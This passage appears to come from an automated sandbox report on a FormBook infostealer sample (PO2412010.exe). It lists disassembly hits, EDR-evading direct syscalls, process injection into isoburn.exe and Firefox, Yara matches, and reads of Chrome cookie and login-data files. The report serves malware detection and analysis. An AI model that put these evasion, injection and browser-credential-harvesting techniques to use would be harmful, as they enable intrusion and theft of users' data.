                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00946 mov eax, dword ptr fs:[00000030h]3_2_01B00946
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0C89D mov eax, dword ptr fs:[00000030h]3_2_01B0C89D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80887 mov eax, dword ptr fs:[00000030h]3_2_01A80887
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4A8E4 mov eax, dword ptr fs:[00000030h]3_2_01B4A8E4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC8F9 mov eax, dword ptr fs:[00000030h]3_2_01ABC8F9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABC8F9 mov eax, dword ptr fs:[00000030h]3_2_01ABC8F9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAE8C0 mov eax, dword ptr fs:[00000030h]3_2_01AAE8C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B508C0 mov eax, dword ptr fs:[00000030h]3_2_01B508C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2483A mov eax, dword ptr fs:[00000030h]3_2_01B2483A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2483A mov eax, dword ptr fs:[00000030h]3_2_01B2483A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA830 mov eax, dword ptr fs:[00000030h]3_2_01ABA830
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov eax, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov eax, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov eax, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov ecx, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov eax, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA2835 mov eax, dword ptr fs:[00000030h]3_2_01AA2835
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0C810 mov eax, dword ptr fs:[00000030h]3_2_01B0C810
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16870 mov eax, dword ptr fs:[00000030h]3_2_01B16870
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16870 mov eax, dword ptr fs:[00000030h]3_2_01B16870
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0E872 mov eax, dword ptr fs:[00000030h]3_2_01B0E872
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0E872 mov eax, dword ptr fs:[00000030h]3_2_01B0E872
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A92840 mov ecx, dword ptr fs:[00000030h]3_2_01A92840
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A84859 mov eax, dword ptr fs:[00000030h]3_2_01A84859
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A84859 mov eax, dword ptr fs:[00000030h]3_2_01A84859
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB0854 mov eax, dword ptr fs:[00000030h]3_2_01AB0854
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B34BB0 mov eax, dword ptr fs:[00000030h]3_2_01B34BB0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B34BB0 mov eax, dword ptr fs:[00000030h]3_2_01B34BB0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90BBE mov eax, dword ptr fs:[00000030h]3_2_01A90BBE
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90BBE mov eax, dword ptr fs:[00000030h]3_2_01A90BBE
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0CBF0 mov eax, dword ptr fs:[00000030h]3_2_01B0CBF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAEBFC mov eax, dword ptr fs:[00000030h]3_2_01AAEBFC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88BF0 mov eax, dword ptr fs:[00000030h]3_2_01A88BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88BF0 mov eax, dword ptr fs:[00000030h]3_2_01A88BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88BF0 mov eax, dword ptr fs:[00000030h]3_2_01A88BF0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA0BCB mov eax, dword ptr fs:[00000030h]3_2_01AA0BCB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA0BCB mov eax, dword ptr fs:[00000030h]3_2_01AA0BCB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA0BCB mov eax, dword ptr fs:[00000030h]3_2_01AA0BCB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2EBD0 mov eax, dword ptr fs:[00000030h]3_2_01B2EBD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80BCD mov eax, dword ptr fs:[00000030h]3_2_01A80BCD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80BCD mov eax, dword ptr fs:[00000030h]3_2_01A80BCD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80BCD mov eax, dword ptr fs:[00000030h]3_2_01A80BCD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAEB20 mov eax, dword ptr fs:[00000030h]3_2_01AAEB20
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAEB20 mov eax, dword ptr fs:[00000030h]3_2_01AAEB20
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B48B28 mov eax, dword ptr fs:[00000030h]3_2_01B48B28
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B48B28 mov eax, dword ptr fs:[00000030h]3_2_01B48B28
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFEB1D mov eax, dword ptr fs:[00000030h]3_2_01AFEB1D
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54B00 mov eax, dword ptr fs:[00000030h]3_2_01B54B00
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7CB7E mov eax, dword ptr fs:[00000030h]3_2_01A7CB7E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2EB50 mov eax, dword ptr fs:[00000030h]3_2_01B2EB50
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B52B57 mov eax, dword ptr fs:[00000030h]3_2_01B52B57
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B52B57 mov eax, dword ptr fs:[00000030h]3_2_01B52B57
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B52B57 mov eax, dword ptr fs:[00000030h]3_2_01B52B57
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B52B57 mov eax, dword ptr fs:[00000030h]3_2_01B52B57
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B28B42 mov eax, dword ptr fs:[00000030h]3_2_01B28B42
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16B40 mov eax, dword ptr fs:[00000030h]3_2_01B16B40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16B40 mov eax, dword ptr fs:[00000030h]3_2_01B16B40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4AB40 mov eax, dword ptr fs:[00000030h]3_2_01B4AB40
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A78B50 mov eax, dword ptr fs:[00000030h]3_2_01A78B50
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B34B4B mov eax, dword ptr fs:[00000030h]3_2_01B34B4B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B34B4B mov eax, dword ptr fs:[00000030h]3_2_01B34B4B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88AA0 mov eax, dword ptr fs:[00000030h]3_2_01A88AA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A88AA0 mov eax, dword ptr fs:[00000030h]3_2_01A88AA0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD6AA4 mov eax, dword ptr fs:[00000030h]3_2_01AD6AA4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8EA80 mov eax, dword ptr fs:[00000030h]3_2_01A8EA80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54A80 mov eax, dword ptr fs:[00000030h]3_2_01B54A80
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB8A90 mov edx, dword ptr fs:[00000030h]3_2_01AB8A90
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABAAEE mov eax, dword ptr fs:[00000030h]3_2_01ABAAEE
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABAAEE mov eax, dword ptr fs:[00000030h]3_2_01ABAAEE
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD6ACC mov eax, dword ptr fs:[00000030h]3_2_01AD6ACC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD6ACC mov eax, dword ptr fs:[00000030h]3_2_01AD6ACC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AD6ACC mov eax, dword ptr fs:[00000030h]3_2_01AD6ACC
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A80AD0 mov eax, dword ptr fs:[00000030h]3_2_01A80AD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AB4AD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AB4AD0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAEA2E mov eax, dword ptr fs:[00000030h]3_2_01AAEA2E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABCA24 mov eax, dword ptr fs:[00000030h]3_2_01ABCA24
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABCA38 mov eax, dword ptr fs:[00000030h]3_2_01ABCA38
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA4A35 mov eax, dword ptr fs:[00000030h]3_2_01AA4A35
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA4A35 mov eax, dword ptr fs:[00000030h]3_2_01AA4A35
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0CA11 mov eax, dword ptr fs:[00000030h]3_2_01B0CA11
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABCA6F mov eax, dword ptr fs:[00000030h]3_2_01ABCA6F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABCA6F mov eax, dword ptr fs:[00000030h]3_2_01ABCA6F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABCA6F mov eax, dword ptr fs:[00000030h]3_2_01ABCA6F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2EA60 mov eax, dword ptr fs:[00000030h]3_2_01B2EA60
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFCA72 mov eax, dword ptr fs:[00000030h]3_2_01AFCA72
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFCA72 mov eax, dword ptr fs:[00000030h]3_2_01AFCA72
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90A5B mov eax, dword ptr fs:[00000030h]3_2_01A90A5B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A90A5B mov eax, dword ptr fs:[00000030h]3_2_01A90A5B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86A50 mov eax, dword ptr fs:[00000030h]3_2_01A86A50
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86A50 mov eax, dword ptr fs:[00000030h]3_2_01A86A50
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86A50 mov eax, dword ptr fs:[00000030h]3_2_01A86A50
                Source: C:\Users\user\Desktop\PO2412010.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PO2412010.exeMemory written: C:\Users\user\Desktop\PO2412010.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 8080Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"Jump to behavior
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: duvyEsVvTpq.exe, 00000005.00000000.1735182617.0000000001820000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000005.00000002.3834328140.0000000001821000.00000002.00000001.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000000.1878108144.0000000001B01000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Users\user\Desktop\PO2412010.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
